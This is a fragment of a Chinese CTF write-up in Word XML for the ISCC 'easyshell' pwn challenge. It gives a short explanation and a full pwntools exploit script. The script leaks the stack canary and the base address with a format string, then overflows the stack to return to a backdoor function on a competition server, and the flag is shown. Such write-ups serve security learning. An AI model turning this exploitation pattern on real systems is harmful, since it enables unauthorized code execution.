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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>+easyshell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解题思路</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="200" w:after="0"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="Xe76a9705b2234c6bc33f95ba0f379ec493926f2"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i/>
          <w:color w:val="4F81BD"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>2.easyshell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明显的栈溢出和格式化字符串，并且程序有后门函数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651760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1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651760"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="1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 xml:space="preserve"> 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格式化字符串直接把canary和程序基址泄露出来，然后直接返回到后门函数就行了，按照这个思路直接去写个python脚本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pwn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ctypes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struct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pack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binary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"./pwn"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elf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ELF(binary)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'182.92.237.102'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port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10011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local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local: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process(binary)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io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remote(ip, port)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context(log_level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'debug'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os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'linux'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arch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'amd64'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def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dbg():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gdb.attach(io)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pause()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io.sendline(data)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sla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text, data: io.sendlineafter(text, data)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io.recv()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ru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text: io.recvuntil(text)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u32(io.recvuntil(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b"\xff"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4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u64(io.recvuntil(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b"\x7f"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:].ljust(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b"\x00"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iuu32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iuu64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12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),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uheap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u64(io.recv(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6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lg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data: io.success(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'%s -&gt; 0x%x'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%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(data,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eval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(data)))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ia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lambda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: io.interactive()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"&gt;&gt;"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b'flagis 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b'%17$p.%15$p'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iuu64()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-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0x1520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backdoor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0x0000000000001289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ret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base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0x000000000000101a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lg(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"base"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'0x'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canary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iuu32()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lg(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"canary"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ru(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"&gt;&gt;"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b'exit'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b'\x00'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payload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payload.ljust(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0x38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,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b'A'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p64(canary)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b'B'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*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8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p64(ret)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p64(backdoor)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sl(payload)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ia()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拿到flag：ISCC{b1e99cf8-d13f-4a99-a12e-3ca0b0716d1a}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p/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from ctypes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from struct import pack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binary = "./pwn"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elf = ELF(binary)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ip = '182.92.237.102'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port = 10011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local = 0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local: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io = process(binary)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else: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io = remote(ip, port)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context(log_level='debug', os='linux', arch='amd64')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dbg():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gdb.attach(io)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pause()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 = lambda data: io.send(data)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sl = lambda data: io.sendline(data)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sa = lambda text, data: io.sendafter(text, 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sla = lambda text, data: io.sendlineafter(text, data)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 = lambda: io.recv()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 = lambda text: io.recvuntil(text)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uu32 = lambda: u32(io.recvuntil(b"\xff")[-4:].ljust(4, b'\x00'))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uu64 = lambda: u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))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iuu32 = lambda: int(io.recv(16), 16)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iuu64 = lambda: int(io.recv(12), 16)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uheap = lambda: u64(io.recv(6).ljust(8, b'\x00'))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lg = lambda data: io.success('%s -&gt; 0x%x' % (data, eval(data)))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ia = lambda: io.interactive()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ru("&gt;&gt;")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payload = b'flagis ' + b'%17$p.%15$p'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sl(payload)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ru('0x')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base = iuu64() - 0x1520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backdoor = base + 0x0000000000001289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ret = base + 0x000000000000101a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lg("base")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ru('0x')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canary = iuu32()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lg("canary")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ru("&gt;&gt;")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payload = b'exit' + b'\x00'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payload = payload.ljust(0x38, b'A') + p64(canary) + b'B'*8 + p64(ret) + p64(backdoor)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sl(payload)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ia()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6226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2024-05-14T03:39:19Z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